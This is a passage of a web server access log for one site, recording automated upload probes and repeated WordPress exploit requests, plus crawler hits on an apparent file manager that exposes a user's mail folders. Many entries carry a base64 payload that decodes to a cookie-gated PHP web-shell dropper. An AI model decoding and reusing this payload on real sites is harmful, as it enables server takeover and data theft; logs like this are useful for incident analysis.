6.2; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0"
198.186.131.59 - - [07/Dec/2025:13:48:44 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; WOW64; Trident/6.0)"
198.186.131.59 - - [07/Dec/2025:13:48:45 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; WOW64; Trident/6.0)"
198.186.131.59 - - [07/Dec/2025:13:48:45 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; WOW64; Trident/6.0)"
66.249.64.110 - - [07/Dec/2025:13:47:34 +0000] "GET /aeee1/?zip=L2hvbWUvaTQ0NjY5OC9tYWlsL21ldGFsZXNjcm9zZS5jb20vcmVsYXRpb25zLy5zcGFtL2N1cg== HTTP/1.1" 200 35240 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.109 - - [07/Dec/2025:13:58:55 +0000] "GET /aeee1/?fm=true&path=/home/i446698/mail/.Drafts/cur/.. HTTP/1.1" 200 9743 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.109 - - [07/Dec/2025:14:05:11 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC8uc3BhbWFzc2Fzc2luYm94ZW5hYmxl HTTP/1.1" 200 7 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
37.112.223.135 - - [07/Dec/2025:14:08:01 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0"
37.112.223.135 - - [07/Dec/2025:14:08:01 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0"
198.186.131.59 - - [07/Dec/2025:14:37:35 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2760.21 Safari/537.36"
198.186.131.59 - - [07/Dec/2025:14:37:36 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2760.21 Safari/537.36"
198.186.131.59 - - [07/Dec/2025:14:37:36 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2760.21 Safari/537.36"
198.186.131.59 - - [07/Dec/2025:14:37:37 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2760.21 Safari/537.36"
37.112.223.135 - - [07/Dec/2025:14:08:04 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0"
192.121.16.196 - - [07/Dec/2025:14:18:56 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0"
192.121.16.196 - - [07/Dec/2025:14:18:57 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0"
198.186.131.59 - - [07/Dec/2025:14:28:02 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0"
198.186.131.59 - - [07/Dec/2025:14:28:02 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0"
194.68.32.135 - - [07/Dec/2025:14:46:24 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2847.61 Safari/537.36"
194.68.32.135 - - [07/Dec/2025:14:46:24 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2847.61 Safari/537.36"
192.121.16.196 - - [07/Dec/2025:14:18:57 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0"
198.186.131.59 - - [07/Dec/2025:14:27:58 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0"
198.186.131.59 - - [07/Dec/2025:14:27:58 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0"
198.186.131.59 - - [07/Dec/2025:14:28:01 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0"
198.186.131.59 - - [07/Dec/2025:14:28:01 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0"
198.186.131.59 - - [07/Dec/2025:14:37:37 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2760.21 Safari/537.36"
194.68.32.135 - - [07/Dec/2025:14:46:23 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2847.61 Safari/537.36"
194.68.32.135 - - [07/Dec/2025:14:46:23 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2847.61 Safari/537.36"
194.68.32.135 - - [07/Dec/2025:14:46:23 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2847.61 Safari/537.36"
194.68.32.135 - - [07/Dec/2025:14:54:41 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0"
194.68.32.135 - - [07/Dec/2025:14:54:41 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0"
194.68.32.135 - - [07/Dec/2025:14:54:43 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0"
180.102.134.69 - - [07/Dec/2025:14:58:08 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
192.121.16.196 - - [07/Dec/2025:15:04:53 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Win64; x64; Trident/4.0)"
198.186.131.59 - - [07/Dec/2025:14:37:38 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2760.21 Safari/537.36"
66.249.64.108 - - [07/Dec/2025:14:52:23 +0000] "GET /aeee1/?fm=true&rights=1762199219.M756126P1290409.altar45.supremepanel45.com,S=6326,W=6495&path=/home/i446698/mail/metalescrose.com/contracts/new/ HTTP/1.1" 200 8169 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.109 - - [07/Dec/2025:14:52:31 +0000] "GET /aeee1/?fm=true&rights=1762199219.M756126P1290409.altar45.supremepanel45.com,S=6326,W=6495&path=/home/i446698/mail/metalescrose.com/contracts/new/ HTTP/1.1" 200 8162 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
194.68.32.135 - - [07/Dec/2025:14:54:42 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0"
194.68.32.135 - - [07/Dec/2025:14:54:47 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0"
194.68.32.135 - - [07/Dec/2025:14:54:49 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0"
192.121.16.196 - - [07/Dec/2025:15:05:15 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Win64; x64; Trident/4.0)"
192.121.16.196 - - [07/Dec/2025:15:05:24 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Win64; x64; Trident/4.0)"
194.68.32.135 - - [07/Dec/2025:14:46:35 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2847.61 Safari/537.36"
192.121.16.196 - - [07/Dec/2025:15:04:44 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Win64; x64; Trident/4.0)"
66.249.64.109 - - [07/Dec/2025:15:11:08 +0000] "GET /aeee1/?fm=true&rights=1762222354.M726677P1666887.altar45.supremepanel45.com,S=3240,W=3328&path=/home/i446698/mail/metalescrose.com/corporatecommunications/new/ HTTP/1.1" 200 8185 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
192.121.16.196 - - [07/Dec/2025:15:15:33 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:50.0) Gecko/20100101 Firefox/50.0"
192.121.16.196 - - [07/Dec/2025:15:15:33 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:50.0) Gecko/20100101 Firefox/50.0"
192.121.16.196 - - [07/Dec/2025:15:15:34 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:50.0) Gecko/20100101 Firefox/50.0"
66.249.64.109 - - [07/Dec/2025:15:07:19 +0000] "GET /aeee1/?zip=L2hvbWUvaTQ0NjY5OC9tYWlsL21ldGFsZXNjcm9zZS5jb20vcmVsYXRpb25zLy5zcGFtL2N1cg== HTTP/1.1" 200 42110 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
192.121.16.196 - - [07/Dec/2025:15:05:25 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Win64; x64; Trident/4.0)"
192.121.16.196 - - [07/Dec/2025:15:05:26 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Win64; x64; Trident/4.0)"
66.249.64.108 - - [07/Dec/2025:15:11:20 +0000] "GET /aeee1/?fm=true&rights=1762222354.M726677P1666887.altar45.supremepanel45.com,S=3240,W=3328&path=/home/i446698/mail/metalescrose.com/corporatecommunications/new/ HTTP/1.1" 200 8180 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
192.121.16.196 - - [07/Dec/2025:15:15:34 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:50.0) Gecko/20100101 Firefox/50.0"
